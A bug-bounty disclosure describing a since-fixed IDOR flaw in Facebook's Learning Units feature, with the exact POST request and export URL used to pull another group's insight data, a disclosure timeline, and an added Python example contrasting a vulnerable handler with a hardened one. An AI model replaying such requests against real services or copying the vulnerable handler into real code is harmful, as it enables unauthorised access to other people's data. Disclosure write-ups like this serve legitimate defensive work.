Disclose the Facebook Learning Unit Group Insight
There is an IDOR issue in a feature called Learning Units that leads to disclosure of the Group Insight data. If the targeted group's privacy is public, the attacker can disclose the group insight without becoming a member; for closed/secret groups, the attacker needs to become a member.
Steps :
1. Request
POST /groups/learning/edit_units_dialog/submit/
.....
group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID
Response :
for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},...
The victim's unit should appear in the attacker's group.
2. The attacker goes to his group > Group Insight, requests a download of the group insight data (.csv format), and waits for the notification from Facebook that the data is ready to be downloaded.
3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/
4. The .csv file, which includes the victim unit's details, is downloaded, and the attacker can see those details by opening the file.
Impact :
An attacker can read the "Group Insight" data.
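The server-side check whose absence the steps above rely on, written as an added example (not code from the original post or from Facebook): the handler must verify that every `unit_ids[]` value belongs to the `group_id` being edited, not only that the caller may edit that group. The data model and all function names are hypothetical.

```python
# Constructed data model (hypothetical names; not Facebook's code).
UNIT_OWNER = {"unit_victim_1": "group_victim", "unit_attacker_1": "group_attacker"}
GROUP_ADMINS = {"group_victim": {"victim"}, "group_attacker": {"attacker"}}


class Forbidden(Exception):
    pass


def submit_units_vulnerable(actor, group_id, unit_ids, group_units):
    """Checks the actor against group_id only; unit_ids are trusted as sent."""
    if actor not in GROUP_ADMINS.get(group_id, set()):
        raise Forbidden("actor cannot edit this group")
    group_units[group_id] = list(unit_ids)
    return group_units[group_id]


def submit_units_hardened(actor, group_id, unit_ids, group_units):
    """Also requires every referenced unit to belong to group_id."""
    if actor not in GROUP_ADMINS.get(group_id, set()):
        raise Forbidden("actor cannot edit this group")
    foreign = [u for u in unit_ids if UNIT_OWNER.get(u) != group_id]
    if foreign:
        # Reject the whole request; the mismatch is worth logging for detection.
        raise Forbidden(f"units not owned by {group_id}: {foreign}")
    group_units[group_id] = list(unit_ids)
    return group_units[group_id]


def completions_export(group_id, group_units):
    """The export trusts the group's unit list, so the check belongs on write."""
    return list(group_units.get(group_id, []))
```

Because the export only reads what was attached to the group, validating object ownership at write time closes the disclosure path without changing the export endpoint.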
Timeline :
18 Aug 2018 : Report sent to Facebook
23 Aug 2018 : Triaged
1 Sept 2018 : Fix Confirmed
1 Sept 2018 : Bounty $1500
Good one bro. Did you check Workplace for this issue? Or was it not vulnerable?